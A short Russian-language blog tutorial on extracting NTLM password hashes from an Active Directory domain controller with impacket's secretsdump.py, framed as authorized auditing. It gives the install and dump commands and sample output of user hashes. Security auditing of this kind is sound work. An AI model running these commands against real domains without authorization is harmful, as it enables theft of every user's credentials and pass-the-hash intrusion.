Вытаскиваем хэш паролей из Active Directory

Если нам (исключительно в целях аудита и по согласованию с владельцем экземпляра AD) понадобилось вытащить хэши паролей пользователей, то в этом поможет пакет python-инструментов impacket, разработанный компанией SecureAuth.

Устанавливаем python, pip и impacket:

root@ubuntu:~# apt install python3 python3-pip
root@ubuntu:~# python3 -m pip install impacket

Из всего набора скриптов нам понадобится только один — secretsdump.py. Положите его в удобное место на диске и запустите со следующими параметрами:

root@ubuntu:~# python3 secretsdump.py домен/логин@контроллер -just-dc-ntlm
root@ubuntu:~# python3 secretsdump.py koobik.local/administrator@10.20.30.40 -just-dc-ntlm

Опция -just-dc-ntlm ограничит вывод до NTLM-хэшей. Пример вывода:

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)

koobik.local\i.ivanov:1011:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
koobik.local\p.petrov:1012:aad3b435b51404eeaad3b435b51404ee:d109d4b749aba95d12042dcdbd8add2d:::
koobik.local\s.sidorov:1013:aad3b435b51404eeaad3b435b51404ee:9bdc61db5a3fced6d82d49279f1f0430:::

Обратите внимание — lm-хэши будут одинаковыми, т.к. не используются (пустой пароль). А по nt-хэшам можно проводить дальнейший аудит.

Полный набор опций secretsdump.py можно найти тут.

Оставить ответ

Ваш адрес email не будет опубликован. Обязательные поля помечены *